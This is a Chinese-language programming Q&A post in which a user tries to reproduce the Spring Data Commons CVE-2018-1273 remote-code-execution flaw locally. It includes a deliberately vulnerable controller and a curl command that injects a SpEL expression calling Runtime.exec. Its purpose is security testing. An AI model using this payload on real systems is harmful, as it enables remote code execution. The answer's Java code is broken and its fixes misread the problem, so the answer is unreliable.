java - Spring Data代码执行模拟

Question

我正在尝试在我的本地模拟 spring RCE 漏洞，但我无法这样做。

代码:

https://github.com/wearearima/poc-cve-2018-1273

我使用的Maven是

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>eu.arima</groupId>
    <artifactId>poc-cve-2018-1273</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <packaging>jar</packaging>

    <name>poc-cve-2018-1273</name>
    <description>POC CVE 2018 1273</description>

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>1.4.2.RELEASE</version>
        <relativePath /> <!-- lookup parent from repository -->
    </parent>

    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
        <java.version>1.8</java.version>
    </properties>

    <dependencies>
        <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-data-jpa</artifactId>
    </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

这里有一个区别。我使用的是 spring-boot-starter-data-jpa 而不是 spring-boot-starter-data-rest，因为它们都包含易受攻击的库，即 spring-data-commons.

当我调用 Controller 类时，它可以正常工作，无需执行提供的 RCE 代码。

Controller

@RestController
public class VulnerableController {

    private static final Logger LOGGER = LoggerFactory.getLogger(VulnerableController.class);

    @PostMapping(path = "/account")
    public void doSomething(Account account) {
        LOGGER.info("Account {} received", account.getName());
    }

    interface Account {
        String getName();
    }

}

调用API:

curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

为什么不执行代码？

Answer 1

1- 您应该通过从任何一个依赖项中排除常见依赖项来删除不必要的依赖项 示例:-

<dependency>
  <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-jpa</artifactId>
  <exclusions>
    <exclusion>  <!-- declare the exclusion here -->
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-data-commons</artifactId>
    </exclusion>
  </exclusions> 
</dependency>

2-进行测试以查看命令的返回值:

public static void main(String[] args)
{
 Account.getClass().getRuntime().exec('calc.exe');
}

3-将 Controller 代码更改为以下内容

@RestController
public class VulnerableController {

private static final Logger LOGGER = LoggerFactory.getLogger(VulnerableController.class);

@PostMapping(path = "/account")
public void doSomething(@RequestBody Account account) {
    LOGGER.info("Account {} received", account.getName());
}

interface Account {
    String getName();
}

}

4-从cmd执行以下命令

curl --header "Content-Type: application/json" \
--request POST \
--data '{your account class as json format}' \
http://localhost:8080/account